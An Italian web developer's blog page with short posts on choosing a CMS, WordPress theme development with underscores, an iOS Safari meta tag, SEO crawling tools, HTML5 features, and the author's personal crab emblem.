Due ore di workshop pratici saranno in esecuzione in parallelo con il resto dell'evento quindi non dimenticate i vostri computer portatili.
I workshop si svolgeranno nell'area 55, la capacità dei posti a sedere è limitata...

Tutto questo organizzato da Shift scopri di più Link

 

WordPress // Drupal // Joomla // 2017

Quale CMS si dovrebbe utilizzare?

State considerando un nuovo sito web per la tua azienda nel 2017?
Chiedendosi quale piattaforma si dovrebbe usare per gestire i tuoi contenuti?

Analizza questa Infografica è scopri tutti i pro e contro dei CMS più diffusi, per pianificare la tua giusta strategia digitale o per semplicemente valutare quello più idoneo al tuo lavoro.

undefined

Grazie a red-website-design.co.uk

Sviluppare un tema WordPress da zero

underscores wordpress

Sviluppare tema WordPress con 'underscores'

Per partire a sviluppare un tema Wordpress, si possono percorrere due strade.
La più complessa,  strutturare script dopo script tutto il template sulla base del 'core' di Wordpress.

Tempo di sviluppo e test, ma potremmo anche velocizzare il nostro lavoro partendo da una buona base.

Un ottimo strumento che genera un template minimale ma completo per partire a sviluppare è: tema underscores

Questo tema estremamente minimale è stato progettato appositamente per essere utilizzato come struttura base per la creazione di un nuovo tema,

Importante non deve essere usato come un  tema child wordpress ;-)

No ci resta che provare ;-)

 

Design Nominees Andres Hunger

andres hunger

Design Nominees Perché un granchio?

Perché un granchio?

Sarebbe troppo semplice definirmi un amante del mare che vivo attivamente e con passione. E’ da lì che proviene la figura che mi rappresenta e che campeggia in home. Ve lo sarete chiesto.
Questo amore lo devo a mio padre, teutonico di Monaco come suggerisce il cognome Hunger, da cui ho anche ereditato una contaminazione continentale e mitteleuropea che si pone accanto a quella artistico creativa di una mamma marchigiana.

In una società tribale fatta di simbologie, ieri ed oggi più che mai, ho scelto (o forse mi ha scelto lui?) il mio alter ego. Il granchio o, come dice la gente di mare da queste parti riferendosi ad una particolare specie, il “pauro”. Già in un rapporto geografico, storico e politico di Pietro Castellano del 1837 si annota in merito ai pregiati frutti del mare di fronte alla costa anconitana:

….”Vi abbondano i crostacei , fra' quali v' hanno taluni particolari granchi di scoglio , che diconsi pauri , di ottimo sapore”.

A parte questo aspetto, il “pauro”, grazie alla capacità ciclica di rinnovare il carapace, è un simbolo di rinascita continua che rappresenta il percorso evolutivo della mia vita. Quasi estinto, lui sta tornando piano piano, rischiando coraggiosamente ogni giorno di essere carpito da uomo o animale durante sue abluzioni sugli scogli della falesia.
Il mito lo pone a difesa dell’idra che Ercole uccise durante una delle sue dodici fatiche ed è da qui che, per compensare l’eroico carattere e seguente sacrificio, nasce la famosa costellazione.
Presso le antiche popolazioni Thai il granchio aveva un ruolo propiziatorio all’ingresso della caverna dell’aldilà e sognarlo fa avverare i desideri.
I miei ed i vostri.

 

 

meta tag Safari telephone=no

undefined

Meta tags utili per il mobile iPhone / iPod / iPad

I Meta-tag sono dei tag Html volti a fornire informazioni aggiuntive (meta-informazioni) non visibili all’utente ma solo al browser, posso servire non solo per la SEO, ma oggi anche per funzionalità aggiuntive per il mobile.

Nel browser Safari per iOS (iPhone / iPod / iPad) come sappiamo rivela in automatico i numeri di telefono e gli indirizzi e-mail per convertirli in link.

Spesso però questa funzionalità potrebbe procurarci dei problemi e confondere l’utente.
Se non si desidera questa funzione, è necessario utilizzare il seguente meta tag.


Safari (iPhone / iPod / iPad):

<meta name="format-detection" content="telephone=no">

Salva

AngularJS for WordPress

undefined

AngularJS for WordPress il plugin che consente di sfruttare tutta l'archittetura di Angular JS, HTML enhanced for web apps!

Non nuovo ma molto utile il plugin AngularJS per WordPress consente di sfruttare facilmente la potenza di AngularJS.
questo il link:wordpress.org/plugins/angularjs-for-wp/developers/

AngularJS è un framework JavaScript per lo sviluppo di applicazioni Web client side, la sua importanza non da poco è che sia supportato da Google questo basta a fare la differenza.

Link: https://angularjs.org/ HTML enhanced for web apps!

 

URL Extractor

undefined

URL Extractor può essere utilizzato per estrarre migliaia di indirizzi e-mail o di altri URL, gli indirizzi web ad esempio, in modalità diverse:
Inserimento (o importare) un elenco di indirizzi di pagine web, l'applicazione utilizzerà le pagine web come un seme per iniziare a raccogliere i dati e visitare le pagine collegate, procedendo in uno sfondo di navigazione a livello profondo richiesto la raccolta di dati fino a che l'utente decide di smettere . (Fonte sito istituzionale)

Link:http://www.tensionsoftware.com/osx/urlextractor/

Screaming Frog SEO Spider Tool

Questo programma è un ottimo strumento per Testare il vostro sito, non sollo in ottica di Semantica SEO ma a 360°, laversione free non consente l'esportazione dei dati.

The Screaming Frog SEO Spider è un piccolo programma desktop è possibile installare in locale sul PC, macchina Mac o Linux che ragni siti web 'link, immagini, CSS, sceneggiatura e le applicazioni dal punto di vista SEO. Si recupera gli elementi chiave in loco per il SEO, li presenta in schede in base al tipo e consente di filtrare per le questioni di SEO comuni, o scomporre e analizzare i dati come si vede in forma esportando in Excel. È possibile visualizzare, analizzare e filtrare i dati di ricerca per indicizzazione come è raccolto e aggiornato continuamente l'interfaccia utente del programma.

The Screaming Frog SEO Spider consente di eseguire la scansione in modo rapido, analizzare e audit di un sito dal punto di vista SEO on-site. È particolarmente efficace per analizzare le medie e grandi siti, dove manualmente controllando ogni pagina sarebbe estremamente alta intensità di lavoro (o impossibile!) E dove si può facilmente perdere un redirect, meta refresh o duplicare problema pagina.

(Dal sito ufficiale www.screamingfrog.co.uk/seo-spider/ )

 

novità dall'HTML5 rispetto all'HTML4

HTML5 vs HTML4

Le novità introdotte dall'HTML5 rispetto all'HTML4 sono finalizzate soprattutto a migliorare il disaccoppiamento fra struttura, definita dal markup, caratteristiche di resa (tipo di carattere, colori, eccetera), definite dalle direttive di stile, e contenuti di una pagina web, definiti dal testo vero e proprio. Inoltre l'HTML5 prevede il supporto per la memorizzazione locale di grosse quantità di dati scaricati dal web browser, per consentire l'utilizzo di applicazioni basate su web (come per esempio le caselle di posta di Google o altri servizi analoghi) anche in assenza di collegamento a Internet.

In particolare:

vengono rese più stringenti le regole per la strutturazione del testo in capitoli, paragrafi e sezioni;
vengono introdotti elementi di controllo per i menu di navigazione;
vengono migliorati ed estesi gli elementi di controllo per i moduli elettronici;
vengono introdotti elementi specifici per il controllo di contenuti multimediali (tag <video> e <audio>);
vengono deprecati o eliminati alcuni elementi che hanno dimostrato scarso o nessun utilizzo effettivo;
vengono estesi a tutti i tag una serie di attributi, specialmente quelli finalizzati all'accessibilità, finora previsti solo per alcuni tag;
viene supportato Canvas che permette di utilizzare JavaScript per creare animazioni e grafica bitmap;
introduzione della geolocalizzazione, dovuta ad una forte espansione di sistemi operativi mobili (quali Android e iOS, tra i più diffusi);
sistema alternativo ai normali cookie, chiamato Web Storage, più efficiente, il quale consente un notevole risparmio di banda;
standardizzazione di programmi JavaScript, chiamati Web Workers e possibilità di utilizzare alcuni siti offline;
sostituzione del lungo e complesso doctype, con un semplice <!DOCTYPE html>.

HTML5  web Developer Andres Hunger
CSS3 web Developer Andres Hunger
javascript web Developer Andres Hunger
jQuery web Developer Andres Hunger
Bootstrap Andres Hunger Blog
WP Developer Andres Hunger